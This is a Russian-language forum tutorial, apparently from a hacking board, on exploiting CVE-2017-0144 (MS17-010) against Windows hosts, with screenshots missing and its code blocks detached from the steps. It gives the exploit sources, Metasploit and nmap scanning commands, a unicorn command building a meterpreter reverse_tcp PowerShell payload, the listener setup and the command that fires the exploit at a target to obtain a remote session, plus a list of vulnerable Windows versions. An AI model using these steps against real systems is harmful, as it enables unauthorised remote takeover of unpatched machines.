Всем привет, сегодня я вам покажу как эксплуатировать CVE-2017-0144 начнем.
Качаем это:
и это :
и вот это:
Кидаем все в одну папку и создаем файл:
Следующим шагом заходим в metasploit.
Пишем :
Должно появиться это:
Теперь пишем:
Нас интересует это:
Далее пишем:
Там, где USERNAME, пишем что получили в nmap(guest)
Ищем этот фрагмент кода:
Убираем комментарий с этой строчки:
Приводим строчку в такой вид:
Теперь создадим нагрузку:
Открываем файл powershell_attack.txt копируем содержимое и вставляем сюда:
Удалим кавычку в конце:
Сохраняем файл.
Выставляем прослушку в metasploit :
Эксплуатируем:
Выполняем команду до тех пор пока не появиться это:
Нам прилетает сессия)
Протестировано на:
Качаем это:
Код:
https://www.exploit-db.com/exploits/42315/
Код:
https://github.com/worawit/MS17-010/blob/master/mysmb.py
Код:
https://github.com/trustedsec/unicorn
Код:
touch _init_.py
Пишем :
Код:
use auxiliary/scanner/smb/pipe_auditor
set rhosts <ваша цель>
run
Код:
nmap -A -p 445 <ваша цель>
Код:
gedit <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/>
Ищем этот фрагмент кода:
Код:
python unicorn.py windows/meterpreter/reverse_tcp <ваш ip> <порт>
Выставляем прослушку в metasploit :
Код:
use exploit multi/handler
set lport <port>
set lhost <ваш ip>
set payload windows/meterpreter/reverse_tcp
exploit
Код:
python <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/> <ip цели> <pipe>(например netlogon)
Код:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
Последнее редактирование: